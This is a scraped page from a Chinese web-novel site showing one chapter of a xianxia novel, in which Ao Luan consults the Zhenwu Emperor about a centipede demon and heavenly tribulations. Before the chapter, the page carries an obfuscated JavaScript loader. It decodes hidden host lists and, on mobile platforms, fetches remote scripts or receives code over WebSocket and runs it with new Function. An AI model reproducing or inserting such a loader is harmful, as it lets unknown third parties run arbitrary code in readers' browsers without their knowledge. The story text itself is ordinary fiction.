笔趣阁

字:
关灯 护眼
笔趣阁 > 我若修仙法力齐天 > 第一千四百八十七章 关门闭户
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第一千四百八十七章 关门闭户

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
当四月中旬的一缕阳光照耀在武当山顶,云海顿时沸腾了起来。
  
  “李兄不要乱冲,那里面有大阵!”
  
  只是光芒普照时,李鸿儒大叫一声‘贵子莽子我来啦’就卷起了狂风一头扎进去。
  
  这让敖娈拿起马牌一通乱按,希冀于龟蛇二将赶紧出来救人。
  
  只是数分钟过后,云海中浮现出龟蛇二将的身影,又有一尊披发跣足的道人在后。
  
  “晚辈敖娈见过帝君!”
  
  敖娈来不及注目龟蛇二将的异色,身体随即俯了下去。
  
  “帝君,我有一好友性急落到了秘境大阵中,还望帝君能宽恕他无心之举!”
  
  敖娈低头。
  
  她来真武宫有疑问和疑惑不得解,但相较于冒然飞纵向秘境的李鸿儒,这些事能临时放一放。
  
  她此前拜访过真武宫,李鸿儒则可能是新手上路。
  
  敖娈不免心切,又带了一丝自责。
  
  在此前的交谈中,基本都是李鸿儒掌握主动来安慰她。
  
  敖娈哪曾想到李鸿儒这般莽撞,只是待到秘境刚刚开启,这就一头撞了过去。
  
  倘若是二龙出水阵也就罢了,没人掌控下只是用迷雾遮掩。
  
  但这是武当山的真武七截大阵,阵法的构建较之二龙出水阵胜出数倍,误入阵法中不亚于渡天劫。
  
  早知如此,她定然要将这片秘境的防护手段介绍一番。
  
  “我道是有什么妖在外候着,原来是你在外面!”
  
  云海中,真武帝君轻轻踩踏,待得注目后有着淡淡的开口。
  
  “见过帝君!”
  
  “冒失就应该吃一些苦头,让他在阵法中呆一呆也好!”
  
  真武帝君的声音传来,敖娈算是清楚了李鸿儒的处置。
  
  这是死罪可免活罪难逃,需要受一些教训。
  
  见得真武帝君清楚后转身欲要回秘境,敖娈这才想起自身的问题。
  
  “帝君请慢,敖娈上半月在桃花源见到一只实力极强的蜈蚣妖,不知帝君可知晓他的来历”敖娈急道。
  
  “天下蜈蚣成妖者甚多,不知你说的是哪一只蜈蚣?”
  
  “那蜈蚣身体呈现银白之彩,浑身宛如金铁,刀剑难伤,实力应该是处于七品到八品左右,不是寂寂无名之辈!”
  
  “那就巧了,去年有一上古异血蜈蚣妖挑衅真武宫,被我等打到了重伤逃遁,他身形特征与你提及相近,或许便是此妖!”
  
  “帝君可知他来路?”
  
  “你可去西海紫云山千花洞,看看对方是否是你所要找的蜈蚣妖!”
  
  李鸿儒淡声出口,算是给百眼魔君招了仇。
  
  他管不得百眼魔君如何处理,但拿这位兄弟垫背或许不算错。
  
  敖娈代表的不仅仅是个人,背后还有珞珈山和西海龙宫,被他顺手拿来继续敲打敲打毗蓝婆菩萨也不错。
  
  “小女子还想询问帝君关于上古妖血之事!”
  
  一桩事落下,见得真武帝君转身隐入云海中,敖娈不由大喊。
  
  “取上古妖血者心性多恶,不乏为非作歹之妖,不知你要问什么?”
  
  “小女子……那上古妖血者渡劫,他们渡劫有什么规矩可遁吗?”
  
  “获得的妖血传承越强,天劫越强,这是规律!”
  
  “小女子觉醒了真龙血脉,不知将来会渡何种天劫!”
  
  “苏醒真龙血脉无忧,足够的实力可以坦然迎接天劫,只有那强行掠夺诱发血脉者才会遭遇更强的天劫。”
  
  “哦!”
  
  敖娈刚‘哦’了一声,随即见得真武帝君的身影消失在云海中,又有龟蛇二将满脸通红,身体有着止不住的颤抖。
  
  “我还没问完呢!”
  
  敖娈心中叨叨。
  
  她也不知自己的真龙血脉是属于觉醒还是属于刺激后的诱发。
  
  被真武帝君说上一句,这让她心中忐忑了起来,只觉在寻求剔除大药身份时,她不乏将来有应对天劫的需求。
  
  若是身体转变了,而后落到一雷落下身死,敖娈不免也觉得自己的命太苦。
  
  “你们……”
  
  “小娈妹下次聊!”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师